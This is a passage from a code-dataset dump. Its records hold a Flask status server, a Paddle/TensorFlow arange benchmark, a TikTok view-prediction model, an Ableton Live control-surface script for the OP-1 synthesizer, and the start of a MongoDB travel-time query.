data:\n msg = {'error': {'code': 400, 'message': 'Bad Request (status or x)'}}\n return jsonify(msg)\n\n count = 1\n if data['id'] in self.screen_buffer['clients']:\n count = self.screen_buffer['clients'][data['id']]['count'] + 1\n self.screen_buffer['clients'][data['id']] = {'status': data['status'], 'count': count}\n\n r = random.randint(1, 255)\n y = data['x'] % r\n self.screen_buffer['max'] = max(self.screen_buffer['max'], count)\n\n if self.screen_buffer['clients'][data['id']]['status'] == 'F':\n self.screen_buffer['min'] = min(self.screen_buffer['min'], count)\n self.screen_buffer['F_status_count'] += 1\n\n if self.queue is not None:\n self.queue.put(self.screen_buffer)\n\n json_response = {'message': {'x': data['x'], 'y': y}}\n return jsonify(json_response)\n\n app.run(host=self.host, port=self.port, debug=False)\n\n\nif __name__ == \"__main__\":\n srv = Server_Flask(HOST, PORT)\n srv.run()\n","sub_path":"server_flask.py","file_name":"server_flask.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"498627439","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom common_import import *\n\n\nclass PDArange(PaddleAPIBenchmarkBase):\n def build_program(self, config):\n result = paddle.arange(\n start=config.start,\n end=config.end,\n step=config.step,\n dtype=config.dtype)\n\n self.feed_vars = []\n self.fetch_vars = [result]\n\n\nclass TFArange(TensorflowAPIBenchmarkBase):\n def build_graph(self, config):\n result = tf.range(\n start=config.start,\n limit=config.end,\n delta=config.step,\n dtype=config.dtype)\n\n self.feed_list = []\n self.fetch_list = [result]\n\n\nif __name__ == '__main__':\n test_main(PDArange(), TFArange(), config=APIConfig(\"arange\"))\n","sub_path":"api/tests_v2/arange.py","file_name":"arange.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"349810029","text":"from scipy import stats\nimport time\n\nfrom data_extraction import extract_data\n\ndef reject_outliers(video_views, video_times, outlier_sensitivity, videos_for_virality, num_days):\n #Reject outlier videos and videos from last two days\n\n #Internal variables\n current_time = time.time()\n days = 60*60*24 * num_days\n odds_of_virality = 0\n x_filtered = []\n video_views_filtered = []\n\n #Creating a list of the filtered videos and the video grid\n for index, value in enumerate(video_views):\n\n if ((current_time - video_times[index]) > days):\n if (stats.zscore(video_views)[index] < outlier_sensitivity):\n video_views_filtered.append(value)\n x_filtered.append(index)\n\n #Counting number of viral videos from past 10 videos and converting to odds of virality\n elif(len(video_views)-index < videos_for_virality):\n odds_of_virality += 1/videos_for_virality\n\n return [x_filtered,video_views_filtered, odds_of_virality]\n\n#Fitting the model to filtered data\ndef fit_model(x_filtered, video_views_filtered, video_views):\n\n x=[i for i in range(len(video_views))]\n slope, intercept, r_value, p_value, std_err = stats.linregress(x_filtered, video_views_filtered)\n next_video_views = slope*(len(video_views)) + intercept\n\n return [slope, intercept, p_value, next_video_views, x]\n\n#Create a dictionary to send to the api request\ndef create_data(x, video_views, x_filtered, video_views_filtered, slope, intercept, p_value, next_video_views, odds_of_virality, outlier_sensitivity, followers, total_likes, user_id):\n data = {\"video number\":x,\n \"video views\":video_views,\n \"filtered video number\":x_filtered,\n \"filtered video views\":video_views_filtered,\n \"odds of viral video\":odds_of_virality,\n \"slope\":slope,\n \"intercept\":intercept,\n \"p value\":p_value,\n \"predicted views\":next_video_views,\n \"outlier senitivity\":outlier_sensitivity,\n \"follower count\":followers,\n \"total likes\":total_likes,\n \"user name\":user_id\n }\n return data\n\n#The main function which calls all other functions\ndef model(user):\n\n #Default variables\n videos_num = 101 #Number of videos wanted\n videos_for_virality = 10 #Number of videos to check for virality\n num_days = 2 #Num of days to ignore\n\n #Defining list of various sensitivies and number of videos to check back.\n sensitivities = [0.1*i for i in range(1,11)]\n result_list = [10*i for i in range(1,11)]\n p_values=[]\n values=[]\n\n #Extracting the data using the tiktokapi\n video_views, video_times, followers, total_likes, user_id = extract_data(user, videos_num)\n\n #Checking the p_value for various video numbers and sensitivities\n for result in result_list:\n for outlier_sensitivity in sensitivities:\n video_views = video_views[-result:]\n video_times = video_times[-result:]\n x_filtered, video_views_filtered, odds_of_virality = reject_outliers(video_views, video_times, outlier_sensitivity, videos_for_virality, num_days)\n slope, intercept, p_value, next_video_views, x = fit_model(x_filtered, video_views_filtered, video_views)\n values.append((result, outlier_sensitivity))\n p_values.append(p_value)\n\n #Choosing the video with best p_value\n result, outlier_sensitivity = values[p_values.index(max(p_values))]\n\n #Using the relevant part of the data according to above p_value (without re-extracting the data for perfomance purposes)\n video_views = video_views[-result:]\n video_times = video_times[-result:]\n\n #Refiting the data with the best p_value and creating the data that will be sent to the client\n x_filtered, video_views_filtered, odds_of_virality = reject_outliers(video_views, video_times, outlier_sensitivity, videos_for_virality, num_days)\n slope, intercept, p_value, next_video_views, x = fit_model(x_filtered, video_views_filtered, video_views)\n data = create_data(x, video_views, x_filtered, video_views_filtered, slope, intercept, p_value, next_video_views, odds_of_virality, outlier_sensitivity, followers, total_likes, user_id)\n\n return data\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"190957572","text":"##################################################################\r\n#\r\n# Copyright (C) 2012 Imaginando, Lda & Teenage Engineering AB\r\n#\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# For more information about this license please consult the\r\n# following webpage: http://www.gnu.org/licenses/gpl-2.0.html\r\n#\r\n##################################################################\r\n\r\n# OP-1 Python Scripts V0.0.1 (Abel custom)\r\n# Customization by: Abel Allison\r\n\r\nfrom functools import partial\r\nimport time\r\n\r\nimport Live\r\n\r\n\r\n# Ableton Live Framework imports\r\nfrom _Framework.ButtonElement import ButtonElement\r\nfrom _Framework.ButtonMatrixElement import ButtonMatrixElement\r\nfrom _Framework.ComboElement import ComboElement\r\nfrom _Framework.ControlSurface import ControlSurface\r\nfrom _Framework.DeviceComponent import DeviceComponent\r\nfrom _Framework.EncoderElement import EncoderElement\r\nfrom _Framework.Layer import Layer\r\nfrom _Framework.MixerComponent import MixerComponent\r\nfrom _Framework.Resource import PrioritizedResource\r\nfrom _Framework.SessionComponent import SessionComponent\r\nfrom _Framework.TransportComponent import TransportComponent\r\n\r\n# Provides many constants\r\nfrom _Framework.InputControlElement import *\r\n\r\n# Utils from APC libs\r\nfrom _APC import ControlElementUtils as APCUtils\r\nfrom _APC.DetailViewCntrlComponent import DetailViewCntrlComponent\r\n\r\nfrom . import modes\r\nfrom . import ui\r\nfrom .consts import *\r\nfrom .ShiftEnabledControl import ShiftEnabledControl\r\nfrom .util import color_to_bytes\r\nfrom .util import midi_bytes_to_values\r\n\r\nCOLOR_BLACK_BYTES = [0x00, 0x00, 0x00]\r\nCOLOR_WHITE_BYTES = [0x7F, 0x7F, 0x7F]\r\n\r\nCONNECTION_MAX_RETRIES = 5\r\n\r\nENCODER_MODE = Live.MidiMap.MapMode.relative_two_compliment\r\n\r\n#\r\n# OP-1 Internal Implementation Constants\r\n#\r\n\r\nENABLE_SEQUENCE = (0xf0, 0x00, 0x20, 0x76, 0x00, 0x01, 0x02, 0xf7)\r\nDISABLE_SEQUENCE = (0xf0, 0x00, 0x20, 0x76, 0x00, 0x01, 0x00, 0xf7)\r\nID_SEQUENCE = (0xf0, 0x7e, 0x7f, 0x06, 0x01, 0xf7)\r\n\r\n\r\nclass OP1(ControlSurface):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tControlSurface.__init__(self, *args, **kwargs)\r\n\r\n\t\tself.log_message('__init__()')\r\n\t\tself.show_message(\"Version: \" + VERSION)\r\n\r\n\t\t# Data for tracking connection attempts\r\n\t\tself.device_connected = False\r\n\t\tself.next_retry_delay = 1\r\n\t\tself.next_retry_ts = None\r\n\t\tself.retries_count = 0\r\n\t\tself._current_midi_map = None\r\n\r\n\t\t# State of display text\r\n\t\tself.text_top = ''\r\n\t\tself.text_bottom = ''\r\n\r\n\t\t# State of display key slots\r\n\t\tself.display_color_by_slot_num = {}\r\n\t\tfor i in range(NUM_DISPLAY_CLIP_SLOTS):\r\n\t\t \tself.display_color_by_slot_num[i] = COLOR_BLACK_BYTES\r\n\r\n\t\twith self.component_guard():\r\n\t\t\tself._build_components()\r\n\t\t\tself.init_modes()\r\n\t#\r\n\t# Ableton Helpers\r\n\t#\r\n\r\n\t@property\r\n\tdef num_tracks(self):\r\n\t\treturn min(NUM_TRACKS, len(self.song().tracks))\r\n\r\n\t@property\r\n\tdef num_scenes(self):\r\n\t\treturn min(NUM_SCENES, len(self.song().scenes))\r\n\r\n\t@property\r\n\tdef selected_track(self):\r\n\t\treturn self.song().view.selected_track\r\n\r\n\t@property\r\n\tdef selected_track_num(self):\r\n\t\treturn list(self.song().tracks).index(self.selected_track)\r\n\r\n\t@property\r\n\tdef selected_scene(self):\r\n\t\treturn self.song().view.selected_scene\r\n\r\n\t@property\r\n\tdef selected_scene_num(self):\r\n\t\treturn list(self.song().scenes).index(self.selected_scene)\r\n\r\n\t@property\r\n\tdef selected_clip_slot(self):\r\n\t\treturn self.selected_track.clip_slots[self.selected_scene_num]\r\n\r\n\t@property\r\n\tdef selected_device(self):\r\n\t\treturn self.selected_track.view.selected_device\r\n\r\n\tdef get_selected_track_devices(self, class_name):\r\n\t\treturn [\r\n\t\t\tdevice for device in self.selected_track.devices\r\n\t\t\tif device.class_name == class_name\r\n\t\t]\r\n\r\n\t#\r\n\t# Connected Components\r\n\t#\r\n\r\n\tdef _with_shift(self, control):\r\n\t\treturn ComboElement(control, modifiers=[self._button_shift])\r\n\r\n\tdef _build_components(self):\r\n\r\n\t\tself._buttons = {}\r\n\t\tfor identifier in range(5, 53) + range(64, 68):\r\n\t\t\t# We create the shift button in a special way\r\n\t\t\tif identifier == OP1_SHIFT_BUTTON:\r\n\t\t\t\tcontinue\r\n\t\t\t# Encoders present as buttons when values are changed\r\n\t\t\tbutton = APCUtils.make_pedal_button(identifier)\r\n\t\t\tbutton.add_value_listener(self.debug_button_handler)\r\n\t\t\tself._buttons[identifier] = button\r\n\r\n\t\t# Encoder buttons\r\n\t\t# See notes below for explanation of exclusion of first button\r\n\t\t# for identifier in [OP1_ENCODER_2_BUTTON, OP1_ENCODER_3_BUTTON, OP1_ENCODER_4_BUTTON]:\r\n\t\t# \tbutton = APCUtils.make_pedal_button(identifier)\r\n\t\t# \tbutton.add_value_listener(self.debug_button_handler)\r\n\t\t# \tAPCUtils.make_pedal_button(identifier] = butto)\r\n\r\n\t\tself._notes = {}\r\n\t\tfor identifier in range(OP1_MIN_NOTE, OP1_MAX_NOTE+1):\r\n\t\t\tnote = APCUtils.make_button(CHANNEL, identifier)\r\n\t\t\tnote.add_value_listener(self.debug_note_handler)\r\n\t\t\tself._notes[identifier] = note\r\n\r\n\t\t# Buttons\r\n\t\tself._button_shift = ButtonElement(\r\n\t\t\tis_momentary=True,\r\n\t\t\tmsg_type=MIDI_CC_TYPE,\r\n\t\t\tchannel=0,\r\n\t\t\tidentifier=OP1_SHIFT_BUTTON,\r\n\t\t\t# Required for modifier buttons\r\n\t\t\tresource_type=PrioritizedResource,\r\n\t\t\tname='ShiftButton',\r\n\t\t)\r\n\t\t# self._button_shift.add_value_listener(self.on_shift_button)\r\n\r\n\t\tself._button_mode_synth = self._buttons[OP1_MODE_1_BUTTON]\r\n\t\tself._button_mode_drum = self._buttons[OP1_MODE_2_BUTTON]\r\n\t\tself._button_mode_tape = self._buttons[OP1_MODE_3_BUTTON]\r\n\t\tself._button_mode_mixer = self._buttons[OP1_MODE_4_BUTTON]\r\n\r\n\t\tself._button_mode_1 = self._buttons[OP1_T1_BUTTON]\r\n\t\tself._button_mode_2 = self._buttons[OP1_T2_BUTTON]\r\n\t\tself._button_mode_3 = self._buttons[OP1_T3_BUTTON]\r\n\t\tself._button_mode_4 = self._buttons[OP1_T4_BUTTON]\r\n\r\n\t\tself._button_down = self._buttons[OP1_ARROW_DOWN_BUTTON]\r\n\t\tself._button_up = self._buttons[OP1_ARROW_UP_BUTTON]\r\n\t\tself._button_left = self._buttons[OP1_LEFT_ARROW]\r\n\t\tself._button_right = self._buttons[OP1_RIGHT_ARROW]\r\n\r\n\t\tself._button_metronome = self._buttons[OP1_METRONOME_BUTTON]\r\n\t\tself._button_scissors = self._buttons[OP1_SCISSOR_BUTTON]\r\n\r\n\t\tself._button_ss1 = self._buttons[OP1_SS1_BUTTON]\r\n\t\tself._button_ss2 = self._buttons[OP1_SS2_BUTTON]\r\n\t\tself._button_ss3 = self._buttons[OP1_SS3_BUTTON]\r\n\t\tself._button_ss4 = self._buttons[OP1_SS4_BUTTON]\r\n\t\tself._button_ss5 = self._buttons[OP1_SS5_BUTTON]\r\n\t\tself._button_ss6 = self._buttons[OP1_SS6_BUTTON]\r\n\t\tself._button_ss7 = self._buttons[OP1_SS7_BUTTON]\r\n\t\tself._button_ss8 = self._buttons[OP1_SS8_BUTTON]\r\n\r\n\t\tself._button_record = self._buttons[OP1_REC_BUTTON]\r\n\t\tself._button_play = self._buttons[OP1_PLAY_BUTTON]\r\n\t\tself._button_stop = self._buttons[OP1_STOP_BUTTON]\r\n\r\n\t\tself._button_microphone = self._buttons[OP1_MICROPHONE]\r\n\t\tself._button_com = self._buttons[OP1_COM]\r\n\t\tself._button_sequencer = self._buttons[OP1_SEQUENCER]\r\n\r\n\t\t# Encoders\r\n\t\tself._encoder_1 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_ENCODER_1, ENCODER_MODE)\r\n\t\tself._encoder_2 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_ENCODER_2, ENCODER_MODE)\r\n\t\tself._encoder_3 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_ENCODER_3, ENCODER_MODE)\r\n\t\tself._encoder_4 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_ENCODER_4, ENCODER_MODE)\r\n\r\n\t\tself._unshift_encoder_1 = ShiftEnabledControl(self._encoder_1, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_2 = ShiftEnabledControl(self._encoder_2, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_3 = ShiftEnabledControl(self._encoder_3, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_4 = ShiftEnabledControl(self._encoder_4, self._button_shift, False, self)\r\n\t\tself._shift_encoder_1 = ShiftEnabledControl(self._encoder_1, self._button_shift, True, self)\r\n\t\tself._shift_encoder_2 = ShiftEnabledControl(self._encoder_2, self._button_shift, True, self)\r\n\t\tself._shift_encoder_3 = ShiftEnabledControl(self._encoder_3, self._button_shift, True, self)\r\n\t\tself._shift_encoder_4 = ShiftEnabledControl(self._encoder_4, self._button_shift, True, self)\r\n\r\n\t\tself._encoder_u01_1 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U01_ENCODER_1, ENCODER_MODE)\r\n\t\tself._encoder_u01_2 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U01_ENCODER_2, ENCODER_MODE)\r\n\t\tself._encoder_u01_3 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U01_ENCODER_3, ENCODER_MODE)\r\n\t\tself._encoder_u01_4 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U01_ENCODER_4, ENCODER_MODE)\r\n\r\n\t\tself._unshift_encoder_u01_1 = ShiftEnabledControl(self._encoder_u01_1, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_u01_2 = ShiftEnabledControl(self._encoder_u01_2, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_u01_3 = ShiftEnabledControl(self._encoder_u01_3, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_u01_4 = ShiftEnabledControl(self._encoder_u01_4, self._button_shift, False, self)\r\n\t\tself._shift_encoder_u01_1 = ShiftEnabledControl(self._encoder_u01_1, self._button_shift, True, self)\r\n\t\tself._shift_encoder_u01_2 = ShiftEnabledControl(self._encoder_u01_2, self._button_shift, True, self)\r\n\t\tself._shift_encoder_u01_3 = ShiftEnabledControl(self._encoder_u01_3, self._button_shift, True, self)\r\n\t\tself._shift_encoder_u01_4 = ShiftEnabledControl(self._encoder_u01_4, self._button_shift, True, self)\r\n\r\n\t\tself._encoder_u02_1 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U02_ENCODER_1, ENCODER_MODE)\r\n\t\tself._encoder_u02_2 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U02_ENCODER_2, ENCODER_MODE)\r\n\t\tself._encoder_u02_3 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U02_ENCODER_3, ENCODER_MODE)\r\n\t\tself._encoder_u02_4 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U02_ENCODER_4, ENCODER_MODE)\r\n\r\n\t\t# NOTE: encoder_1_button conflicts with encoder_U03_4\r\n\t\tself._encoder_button_1 = self._buttons[OP1_ENCODER_1_BUTTON]\r\n\t\tself._encoder_button_2 = self._buttons[OP1_ENCODER_2_BUTTON]\r\n\t\tself._encoder_button_3 = self._buttons[OP1_ENCODER_3_BUTTON]\r\n\t\tself._encoder_button_4 = self._buttons[OP1_ENCODER_4_BUTTON]\r\n\r\n\t\tself._mixer = MixerComponent(\r\n\t\t\tnum_tracks=NUM_TRACKS,\r\n\t\t\tnum_returns=2,\r\n\t\t)\r\n\t\t# self._mixer.set_select_buttons(\r\n\t\t# \tprev_button=self._button_up,\r\n\t\t# \tnext_button=self._button_down,\r\n\t\t# )\r\n\t\t# self.map_mixer_controls_for_current_track()\r\n\r\n\t\tdef on_down_button(value):\r\n\t\t\tif value == BUTTON_ON:\r\n\t\t\t\tself.set_selected_scene(self.scene_offset + 1)\r\n\r\n\t\tdef on_up_button(value):\r\n\t\t\tif value == BUTTON_ON:\r\n\t\t\t\tself.set_selected_scene(self.scene_offset - 1)\r\n\r\n\t\tself.scene_offset = 0\r\n\t\tself.song().view.add_selected_scene_listener(self.selected_scene_changed)\r\n\t\tself._button_right.add_value_listener(on_down_button)\r\n\t\tself._button_left.add_value_listener(on_up_button)\r\n\r\n\t\tself._transport = TransportComponent()\r\n\t\tself._transport.set_metronome_button(self._button_metronome)\r\n\r\n\t\t#\r\n\t\t# Controls for navigating the bottom detail pane\r\n\t\t#\r\n\t\tself._device_navigation = DetailViewCntrlComponent()\r\n\r\n\t\t# Toggle hide/show of bottom detail pane\r\n\t\tself._device_navigation.set_detail_toggle_button(self._button_ss1)\r\n\r\n\t\t# Toggle between clip detail and effects detail in bottom detail pane\r\n\t\tself._device_navigation.set_device_clip_toggle_button(self._button_ss2)\r\n\r\n\t\t# Nav left/right in the device chain detail view in bottom pane\r\n\t\tself._device_navigation.device_nav_left_button.set_control_element(self._button_ss7)\r\n\t\tself._device_navigation.device_nav_right_button.set_control_element(self._button_ss8)\r\n\r\n\t\t# Clip firing\r\n\t\tself._notes[OP1_F3_NOTE].add_value_listener(partial(self.clip_fired, 0))\r\n\t\tself._notes[OP1_G3_NOTE].add_value_listener(partial(self.clip_fired, 1))\r\n\t\tself._notes[OP1_A3_NOTE].add_value_listener(partial(self.clip_fired, 2))\r\n\t\tself._notes[OP1_B3_NOTE].add_value_listener(partial(self.clip_fired, 3))\r\n\t\tself._notes[OP1_C4_NOTE].add_value_listener(partial(self.clip_fired, 4))\r\n\t\tself._notes[OP1_D4_NOTE].add_value_listener(partial(self.clip_fired, 5))\r\n\t\tself._notes[OP1_E4_NOTE].add_value_listener(partial(self.clip_fired, 6))\r\n\t\tself._notes[OP1_F4_NOTE].add_value_listener(partial(self.clip_fired, 7))\r\n\r\n\t\tself._button_scissors.add_value_listener(self.selected_clip_deleted)\r\n\r\n\t\t#\r\n\t\t# Device Controls\r\n\t\t#\r\n\r\n\t\t# self._device = DeviceComponent(\r\n\t\t# \tname='Device_Component',\r\n\t\t# \tis_enabled=False,\r\n\t\t# \tlayer=Layer(\r\n\t\t# \t\tparameter_controls=ButtonMatrixElement(rows=[[\r\n # \t\t\t\tself._encoder_u01_1,\r\n\t\t# \t\t\tself._encoder_u01_2,\r\n\t\t# \t\t\tself._encoder_u01_3,\r\n\t\t# \t\t\tself._encoder_u01_4,\r\n\t\t# \t\t\tself._encoder_u02_1,\r\n\t\t# \t\t\tself._encoder_u02_2,\r\n\t\t# \t\t\tself._encoder_u02_3,\r\n\t\t# \t\t\tself._encoder_u02_4,\r\n # \t\t]]),\r\n\t\t# \t\t# bank_buttons=ButtonMatrixElement(rows=[[\r\n\t\t# \t\t# \tself._encoder_button_1,\r\n\t\t# \t\t# \tself._encoder_button_2,\r\n\t\t# \t\t# \tself._encoder_button_3,\r\n\t\t# \t\t# \tself._encoder_button_4,\r\n\t\t# \t\t# ]]),\r\n\t\t# \t\tbank_prev_button=self._button_ss5,\r\n\t\t# \t\tbank_next_button=self._button_ss6,\r\n\t\t# \t\ton_off_button=self._button_record,\r\n\t\t# \t),\r\n\t\t# \tdevice_selection_follows_track_selection=True\r\n\t\t# )\r\n\t\t# self._device.set_enabled(True)\r\n\t\t# self.set_device_component(self._device)\r\n\r\n\t#\r\n\t# Mode configuration\r\n\t#\r\n\r\n\tdef init_modes(self):\r\n\t\tself.tracks_mode = modes.TracksMode(self)\r\n\t\tself.effects_mode = modes.EffectsMode(self)\r\n\r\n\t\tself.current_mode = None\r\n\r\n\t\tself._button_mode_synth.add_value_listener(\r\n\t\t\tpartial(self.on_mode_button, self.tracks_mode))\r\n\t\tself._button_mode_drum.add_value_listener(\r\n\t\t \tpartial(self.on_mode_button, self.effects_mode))\r\n\t\t# self._button_mode_3.add_value_listener(\r\n\t\t# \tpartial(self.on_mode_button, ))\r\n\t\t# self._button_mode_4.add_value_listener(\r\n\t\t# \tpartial(self.on_mode_button, ))\r\n\r\n\t\tself.set_mode(self.tracks_mode)\r\n\r\n\tdef set_mode(self, mode):\r\n\t\tself.log_message('set_mode()')\r\n\t\tif self.current_mode is not None:\r\n\t\t\tself.current_mode.deactivate()\r\n\t\tself.current_mode = mode\r\n\t\tself.current_mode.activate()\r\n\r\n\tdef on_mode_button(self, mode, value):\r\n\t\tif value:\r\n\t\t\tself.set_mode(mode)\r\n\r\n\t#\r\n\t# Shift Button Alternative modes\r\n\t#\r\n\r\n\tdef on_shift_button(self, value):\r\n\t\tif value == BUTTON_ON:\r\n\t\t\tself.log_message('shift on')\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tself.log_message('shift off')\r\n\t\t\tpass\r\n\r\n\t#\r\n\t# Scene selection\r\n\t#\r\n\r\n\tdef selected_scene_changed(self):\r\n\t\tself.log_message('selected_scene_changed()')\r\n\t\tself.scene_offset = self.selected_scene_num\r\n\t\tself.map_clip_controls_for_current_scene()\r\n\r\n\tdef set_selected_scene(self, scene_offset):\r\n\t\tscene_offset = max(0, scene_offset)\r\n\t\tscene_offset = min(scene_offset, self.num_scenes-1)\r\n\r\n\t\tnext_scene = self.song().scenes[scene_offset]\r\n\t\tnext_scene = self.song().view.selected_scene = next_scene\r\n\r\n\t\tself.scene_offset = scene_offset\r\n\r\n\tdef clear_key_assignments(self):\r\n\t\tpass\r\n\r\n\tdef map_clip_controls_for_current_scene(self):\r\n\t\tfor clip_slot in self.selected_scene.clip_slots:\r\n\t\t\tpass\r\n\r\n\t#\r\n\t# Clip triggers\r\n\t#\r\n\r\n\tdef clip_fired(self, clip_num, value):\r\n\t\tif value == NOTE_ON:\r\n\r\n\t\t\tself.log_message('clip_fired(clip_num=%s, value=%s)' % (clip_num, value))\r\n\t\t\tclip_slot = self.selected_track.clip_slots[clip_num]\r\n\r\n\t\t\t# if clip_slot.is_playing:\r\n\t\t\t# \tself.log_message('stoping clip')\r\n\t\t\t# \tclip_slot.stop()\r\n\t\t\t# else:\r\n\t\t\t# \tself.log_message('firing clip. has_clip=%s has_stop=%s, playing_status=%s' % (\r\n\t\t\t# \t\tclip_slot.has_clip,\r\n\t\t\t# \t\tclip_slot.has_stop_button,\r\n\t\t\t# \t\tclip_slot.playing_status,\r\n\t\t\t# \t))\r\n\t\t\t# \tclip_slot.fire()\r\n\r\n\t\t\tself.log_message('firing clip. has_clip=%s has_stop=%s, playing_status=%s' % (\r\n\t\t\t\tclip_slot.has_clip,\r\n\t\t\t\tclip_slot.has_stop_button,\r\n\t\t\t\tclip_slot.playing_status,\r\n\t\t\t))\r\n\t\t\tclip_slot.fire()\r\n\r\n\r\n\r\n\t\t\t# Update scene selection to fired clip's row.\r\n\t\t\tself.set_selected_scene(clip_num)\r\n\r\n\tdef selected_clip_deleted(self, value):\r\n\t\tif value == BUTTON_ON:\r\n\t\t\tself.log_message('deleting clip')\r\n\t\t\tself.selected_clip_slot.delete_clip()\r\n\r\n\t#\r\n\t# Looper triggers\r\n\t#\r\n\r\n\tdef looper_fired(looper_device):\r\n\t\tfire_param = [param for param in looper_device.parameters if param.name == 'State']\r\n\t\tself.log_message(fire_param)\r\n\r\n\t#\r\n\t# Refresh handling\r\n\t#\r\n\r\n\tdef handle_sysex(self, midi_bytes):\r\n\t\tsuper(OP1, self).handle_sysex(midi_bytes)\r\n\t\tif (len(midi_bytes) >= 8 and (midi_bytes[6]==32) and (midi_bytes[7]==118)):\r\n\t\t\tself.handle_device_connection_success()\r\n\t\telse:\r\n\t\t\tself.log_message(\"sysex: %s\" % (midi_bytes, ))\r\n\r\n\tdef refresh_state(self):\r\n\t\tsuper(OP1, self).refresh_state()\r\n\r\n\t\tself.log_message(\"refresh_state()\")\r\n\t\tself.retries_count = 0\r\n\t\tself.next_retry_ts = None\r\n\t\tself.next_retry_delay = 1\r\n\t\tself.device_connected = False\r\n\r\n\tdef update_display(self):\r\n\t\tsuper(OP1, self).update_display()\r\n\r\n\t\tif not(self.device_connected):\r\n\t\t\tif self.next_retry_ts is None or time.time() >= self.next_retry_ts:\r\n\t\t\t\tself.attempt_connection_with_device()\r\n\t\t\treturn\r\n\r\n\t\t# Render the currently active view\r\n\t\tself.current_mode.view.render()\r\n\r\n\t#\r\n\t# Connection Management\r\n\t#\r\n\r\n\tdef build_midi_map(self, midi_map_handle):\r\n\t\tsuper(OP1, self).build_midi_map(midi_map_handle)\r\n\r\n\t\t# map mixer controls to currently selected track\r\n\t\t# self.map_mixer_controls_for_current_track()\r\n\r\n\tdef attempt_connection_with_device(self):\r\n\t\tself.log_message(\"Attempting to connect to OP-1... (num_retries: %s)\" % self.retries_count)\r\n\t\tself.retries_count += 1\r\n\t\tself.next_retry_ts = time.time() + self.next_retry_delay\r\n\t\tself.next_retry_delay *= 2\r\n\t\tself._send_midi(ID_SEQUENCE)\r\n\r\n\tdef handle_device_connection_success(self):\r\n\t\tself.device_connected = True\r\n\t\tself.retries_count = 0\r\n\t\tself.log_message(\"OP-1 Connected\")\r\n\t\tself._send_midi(ENABLE_SEQUENCE)\r\n\r\n\tdef disconnect(self):\r\n\t\tself.log_message(\"disconnect()\")\r\n\t\tself.retries_count = 0\r\n\t\tself.device_connected = False\r\n\t\tself._send_midi(DISABLE_SEQUENCE)\r\n\t\tsuper(OP1, self).disconnect()\r\n\r\n\tdef suggest_input_port(self):\r\n\t\treturn \"OP-1 Midi Device\"\r\n\r\n\tdef suggest_output_port(self):\r\n\t\treturn \"OP-1 Midi Device\"\r\n\r\n\t#\r\n\t# Debug utils\r\n\t#\r\n\r\n\tdef param_value_updated(self, param):\r\n\t\tself.log_message('Param update: %s(%s)' % (param.name, param.value))\r\n\t\tself.log_message(' value_items: %s' % (list(param.value_items), ))\r\n\r\n\tdef debug_button_handler(self, value, *args, **kwargs):\r\n\t\tself.log_message('button: %s' % value)\r\n\r\n\tdef debug_note_handler(self, value, *args, **kwargs):\r\n\t\tself.log_message('note: %s' % value)\r\n\r\n\tdef handle_nonsysex(self, midi_bytes):\r\n\t\tsuper(OP1, self).handle_nonsysex(midi_bytes)\r\n\t\tchannel, identifier, value, is_pitchbend = midi_bytes_to_values(midi_bytes)\r\n\t\tif not is_pitchbend:\r\n\t\t\tself.log_message('midi ch:%s value:%s(%s)' % (channel, identifier, value))\r\n\r\n","sub_path":"OP1.py","file_name":"OP1.py","file_ext":"py","file_size_in_byte":18729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"198406632","text":"from datetime import datetime\nfrom query_setup import collection\n\n\n# Query 3:\n# Single-Day Station Travel Times: Find travel time for station Foster NB for 5-minute \n# intervals for Sept 22, 2011. Report travel time in seconds.\n\n\n# Get total travel time for Foster NB\ndef foster_nb_travel_time(start, end):\n total_length = 0\n length = 0\n total_speed = 0\n speed = 0\n num_speeds = 0\n avg_speed = 0 \n # Query for Foster NB and given start/end times \n criteria = {\n \"location.stationname\": \"Foster NB\",\n \"recorded.datetimerecorded\": {\n \"$gte\": start.timestamp() * 1000,\n \"$lte\": end.timestamp() * 1000\n }\n }\n \n # Loop through each document/entry in the collection with the given criteria\n for document in collection.find(criteria): \n # Add length if it isn't null 